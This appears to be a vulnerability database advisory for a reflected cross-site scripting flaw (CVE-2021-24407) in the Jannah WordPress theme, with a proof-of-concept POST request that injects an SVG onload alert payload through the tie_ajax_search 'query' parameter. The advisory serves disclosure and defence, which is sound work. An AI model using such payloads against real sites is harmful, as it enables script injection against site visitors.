Jannah < 5.4.5 – Reflected Cross-Site Scripting (XSS) | CVE 2021-24407 | Theme Vulnerabilities

Description

The theme did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability.

Proof of Concept

POST /demo/wp-admin/admin-ajax.php HTTP/1.1
Host: jannah.tielabs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 66
Connection: close

action=tie_ajax_search&query[]=<svg+onload=alert(document.domain)>

Affects Themes

Fixed in 5.4.5

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Truoc Phan from Techlab Corporation

Submitter

Truoc Phan

Submitter website

https://www.facebook.com/292706121240740

Submitter twitter

Verified

Yes

WPVDB ID

fba9f010-1202-4eea-a6f5-78865c084153

Timeline

Publicly Published

2021-06-14 (about 2 years ago)

Added

2021-06-14 (about 2 years ago)

Last Updated

2021-06-25 (about 2 years ago)

Other

Published

Title

Published

2014-08-01

Title

allure-real-estate-theme-for-real-estate <= 0.1.1 - XSS in ZeroClipboard.swf

Published

2024-02-27

Title

Profile Box Shortcode And Widget < 1.2.1 - Admin+ Stored XSS

Published

2023-09-25

Title

Booking Calendar < 9.7.4 - Authenticated(Contributor+) Stored Cross-Site Scripting via shortcode

Published

2024-01-08

Title

Formidable Forms < 6.7.1 - HTML Injection

Published

2024-03-06

Title

The Plus Addons for Elementor < 5.4.1 - Authenticated (Contributor+) Stored Cross-Site Scripting Header Meta Content Widget